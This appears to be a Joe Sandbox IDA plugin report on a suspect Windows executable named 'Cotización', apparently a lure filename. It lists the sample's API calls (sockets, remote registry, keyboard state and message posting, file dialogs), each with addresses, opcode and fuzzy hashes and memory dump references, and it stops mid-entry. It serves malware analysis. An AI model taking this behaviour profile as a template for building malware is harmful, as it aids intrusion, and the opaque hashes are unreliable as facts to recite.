                • API String ID: 637971194-197072765
                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove$_malloc
                • String ID:
                • API String ID: 1938898002-0
                • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                APIs
                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                • _memmove.LIBCMT ref: 0044B555
                • _memmove.LIBCMT ref: 0044B578
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                • String ID:
                • API String ID: 2737351978-0
                • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                • __calloc_crt.LIBCMT ref: 00415246
                • __getptd.LIBCMT ref: 00415253
                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                • _free.LIBCMT ref: 0041529E
                • __dosmaperr.LIBCMT ref: 004152A9
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                • String ID:
                • API String ID: 3638380555-0
                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                APIs
                • VariantInit.OLEAUT32(?), ref: 0046C96E
                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Variant$Copy$ClearErrorInitLast
                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                • API String ID: 3207048006-625585964
                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                APIs
                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                • gethostbyname.WSOCK32(?), ref: 004655A6
                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                • _memmove.LIBCMT ref: 004656CA
                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                • WSACleanup.WSOCK32 ref: 00465762
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                • String ID:
                • API String ID: 2945290962-0
                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                APIs
                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                • String ID:
                • API String ID: 1457242333-0
                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                APIs
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ConnectRegistry_memmove_wcslen
                • String ID:
                • API String ID: 15295421-0
                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • _wcstok.LIBCMT ref: 004675B2
                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                • _wcscpy.LIBCMT ref: 00467641
                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                • _wcslen.LIBCMT ref: 00467793
                • _wcslen.LIBCMT ref: 004677BD
                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                • String ID: X
                • API String ID: 780548581-3081909835
                • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                APIs
                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                • CloseFigure.GDI32(?), ref: 0044751F
                • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                • String ID:
                • API String ID: 4082120231-0
                • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                • String ID:
                • API String ID: 2027346449-0
                • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                • GetMenu.USER32 ref: 0047A703
                • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                • _wcslen.LIBCMT ref: 0047A79E
                • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                • String ID:
                • API String ID: 3257027151-0
                • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                APIs
                • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorLastselect
                • String ID:
                • API String ID: 215497628-0
                • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                APIs
                • GetParent.USER32(?), ref: 0044443B
                • GetKeyboardState.USER32(?), ref: 00444450
                • SetKeyboardState.USER32(?), ref: 004444A4
                • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                APIs
                • GetParent.USER32(?), ref: 00444633
                • GetKeyboardState.USER32(?), ref: 00444648
                • SetKeyboardState.USER32(?), ref: 0044469C
                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$Parent
                • String ID:
                • API String ID: 87235514-0
                • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                APIs
                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                • DeleteObject.GDI32(?), ref: 00455736
